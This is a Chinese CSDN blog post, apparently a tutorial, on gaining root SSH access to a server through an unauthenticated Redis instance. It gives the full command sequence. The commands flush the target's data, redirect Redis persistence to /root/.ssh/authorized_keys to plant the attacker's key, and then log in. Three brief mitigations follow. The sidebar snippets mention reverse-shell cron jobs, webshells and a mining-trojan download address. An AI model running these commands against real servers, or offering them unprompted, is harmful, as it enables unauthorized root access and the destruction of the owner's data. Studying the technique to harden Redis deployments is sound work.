利用redis漏洞入侵服务器

最新推荐文章于 2024-05-28 15:44:55 发布
最新推荐文章于 2024-05-28 15:44:55 发布
阅读量1.2k 收藏 1
点赞数
分类专栏: 技术 文章标签: redis
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yaoxiaofeng_000/article/details/79920668
版权

目标机:172.16.20.173

登录机:172.16.20.55


假设172.16.20.173 开放6379端口,并且暴露在公网上没有设置密码,嘿嘿,那么你就知道后面发生的事情了。

首先把自己的公钥写到一个临时文件中,注意前后要加换行,不然会导致找不到对应的秘钥

# $ (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > foo.txt
# redis-cli -h 172.16.20.173 flushall
$ cat foo.txt | redis-cli -h 172.16.20.173 -x set redis
$ redis-cli -h 172.16.20.173
$ 172.16.20.173:6379> config set dir /root/.ssh/
OK
$ 172.16.20.173:6379> config get dir
1) "dir"
2) "/root/.ssh"
$ 172.16.20.173:6379> config set dbfilename "authorized_keys"
OK
$ 172.16.20.173:6379> save
OK

好了,利用redis的持久化功能,你已成功将自己的公钥写到靶机上了,然后可以 ssh 172.16.20.173 上去了。

有攻就有防,防范措施如下:

1、redis设置密码

2、redis能不暴露在公网就不暴露

3、redis不要用root权限启动

晓峰好神奇
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Redis系列漏洞总结
NLost
10-21 6272
未授权访问;redis写入webshell;redis写入ssh公钥登录;写入计划任务反弹shell;主从复制rce;什么是主从复制;ssrf+redis写入webshell;Redis Lua 沙盒绕过rce
红队攻防实战系列一之metasploit
自强不息
11-26 1135
百目无她,百书质华,君当醒悟,建我中华
Redis漏洞总结
最新发布
白帽子佳奇的博客
05-28 942
redis是一个key-value存储系统。和Memcached类似,它支持存储的value类型相对更多,包括string(字符串)、list(链表)、set(集合)、zset(sorted set --有序集合)和hash(哈希类型)。这些数据类型都支持push/pop、add/remove及取交集并集和差集及更丰富的操作,而且这些操作都是原子性的。在此基础上,redis支持各种不同方式的排序。与memcached一样,为了保证效率,数据都是缓存在内存中。
Redis升级】---修复代码注入漏洞、缓冲区错误漏洞
✨ 欢迎来到【Seal ^_^ 的CSDN博客】!这里是我记录技术心得、分享经验的地方。✨
06-10 1万+
Redis版本升级(redis-4.0.8升级至redis-7.0.9)----解决【redis代码注入漏洞redis缓冲区错误漏洞
redis安全攻防(专注渗透视角)
LainWith的博客
04-11 2924
数据库作为业务平台信息技术的核心和基础,承载着越来越多的关键数据,渐渐成为单位公共安全中最具有战略性的资产,数据库的安全稳定运行也直接决定着业务系统能否正常使用。并且平台的数据库中往往储存着等极其重要和敏感的信息。这些信息一旦被篡改或者泄露,轻则造成企业经济损失,重则影响企业形象,甚至行业、社会安全。可见,数据库安全至关重要。所以对数据库的保护是一项必须的,关键的,重要的工作任务。
Redis未授权访问漏洞(三)Redis写入反弹连接定时任务
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
01-10 445
这里可以看到我们已经成功用192.168.142.44的redis客户端连接了位192.168.142.66的服务端。我们通过攻击机启动Redis客户端去远程连接靶机的6379端口,模仿黑客通过公网的6379端口入侵企业的Web服务器。我们现在查看一下当前root用户的定时文件有没有我们设置的定时任务。攻击机: Centos7 IP:192.168.142.44。修改数据文件存储路劲为 /var/spool/cron。然后我们再打开一个终端去监听我们本地的7777端口。可以看到定时任务写入成功。
Redis未授权访问配合SSH key文件利用详解
01-19
攻击者利用这种漏洞的常见手段是通过Redis的`config`命令写入SSH公钥到目标服务器的`~/.ssh/authorized_keys`文件,从而无需密码就能直接登录服务器。攻击者首先创建SSH密钥对,然后将公钥内容写入一个文本文件,...
被动式漏洞扫描系统.zip
03-08
为避免 Gourdscan 被恶意利用,开源版本只放出了简单的探测规则,无法用作为黑客入侵工具。请使用者遵守《中华人民共和国网络安全法》,勿将 Gourdscan 用于未授权的测试,参与项目的社区成员/YSRC/同程安全应急响应...
服务器
02-17
3. **缓存机制**:利用内存或专门的缓存服务(如Redis、Memcached)存储常用数据,减少硬盘读取,提高性能。 4. **日志管理**:有效管理和分析日志,及时发现并解决问题,保持服务稳定。 在服务器安全方面,应重视...
网狐服务器架设指南!
06-19
同时,定期进行安全审计和漏洞修复,确保服务器安全。 **六、监控与日志管理** 监控系统如Zabbix、Prometheus可实时监控服务器性能,发现并预警异常。日志管理系统收集、分析服务器日志,帮助定位问题和调优。 **...
080-从信息泄漏到Getshell.pdf
09-20
黑客可以利用MySQL写入木马进行提权,或者直接利用Redis的root权限作为跳板入侵其他内网机器。 然而,由于目标系统的MySQL和Redis未对外网开放,因此无法直接利用这些泄漏信息。作者转而寻找其他途径,通过尝试登录...
Redis服务入侵
一枚小白的分享,不喜勿喷~
08-22 858
百度百科:Redis(Remote Dictionary Server),即远程字典服务,是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。Redis因配置不当可导致攻击者直接获取到服务器的权限。利用条件:redis以root身份运行,未授权访问,弱口令或者口令泄露等。
数据库攻防之Redis
m0_71745754的博客
01-17 1053
Redis(Remote Dictionary Server)是一个由 Salvatore Sanfillppo 写的 key-value存储系统。是一个开源的使用 ANSI C 语言编写、遵守 BSD 协议、支持网络、可基于内存、分布式、可选持久性的键值对(Key-Value)存储数据库,并提供多种语言的API。通常被称为数据结构服务器,因为值(value)可以是字符串(string)、哈希(hash)、列表(list)、集合(sets)和有序集合(sortedsets)等类型。
【愚公系列】2023年05月 Web渗透测试之攻击内网Redis
时光隧道
08-24 5万+
Redis的内网渗透是指攻击者利用漏洞或者弱密码进入Redis服务器所在的内网,然后利用Redis服务本身的漏洞或者弱密码拿到Redis服务器的控制权,并继续向内网内的其他计算机和服务发起攻击。这种攻击方式在内部网络防火墙被绕过的情况下非常有效,因此需要加强Redis本身的安全保护措施,并加强内网安全防范措施。
渗透测试 | Redis渗透
jklbnm12的博客
10-09 1189
Redis 0x01 简介 REmote DIctionary Server(Redis)是一个由 Salvatore Sanfilippo写的key-value存储系统。 Redis是—个开源的使用ANSI C语言编写、遵守BSD协议、支持网络、可基于內存亦可持久化的日志型、Key-Value数据库,并提供多种语言的APl。它通常被称为数据结构服务器,因为值(value)可以是字符串(String),哈希(Map),列表(List),集合(sets)和有序集合(sorted sets)等类型。从2010年
H2Miner变种,利用Redis漏洞入侵服务器wa矿
热门推荐
China Honker 博客
01-12 114万+
H2Miner变种木马入侵后会下载挖矿木马,通过安装定时任务持久化,通过SSH复用连接进行横向移动感染。该程序由GO语言开发,通过还原后的函数名进行对比,可知其是H2Miner此前的kinsing文件变种,并且与http[:]//45.10.88.124/kinsing下载得到的文件一致。Redis 4.x/5.x 版本存在主从同步命令执行漏洞(CNVD-2019-21763),攻击者通过构造特定的请求实现漏洞利用,成功利用漏洞可在目标服务器上实现Getshell,该漏洞风险较高,且漏洞利用方式已被公开。
Redis漏洞利用的4种方法
qq_50854662的博客
05-13 4544
Redis简介 redis是一个key-value存储系统。和Memcached类似,它支持存储的value类型相对更多,包括string(字符串)、list(链表)、set(集合)、zset(sorted set --有序集合)和hash(哈希类型)。这些数据类型都支持push/pop、add/remove及取交集并集和差集及更丰富的操作,而且这些操作都是原子性的。在此基础上,redis支持各种不同方式的排序。与memcached一样,为了保证效率,数据都是缓存在内存中。区别的是redis会周期性的把更
【实战记录】记录服务器遭到攻击全过程(Redis漏洞
qq_41997592的博客
02-13 3424
第一次面对服务器攻击全过程,由被动到主动!!
Redis未授权漏洞复现及利用(window,linux)
dreamthe的博客
03-22 1万+
1.了解redis Redis(Remote Dictionary Server ),即远程字典服务,是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。从2010年3月15日起,Redis的开发工作由VMware主持。从2013年5月开始,Redis的开发由Pivota赞助。 2.redis漏洞原理 Redis默认情况下是绑定在0.0.0.0:6379端口的,如果没有设置密码(一般密码为空)或者密码为弱密码的情况下并且也没有
redis 漏洞利用
09-30
redis 漏洞利用可以通过redis-rogue-server工具来实现。该工具适用于目标存在Redis未授权访问漏洞时使用,无法对Redis密码进行认证。你可以从https://github.com/n0b0dyCN/redis-rogue-server下载该工具。请注意,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值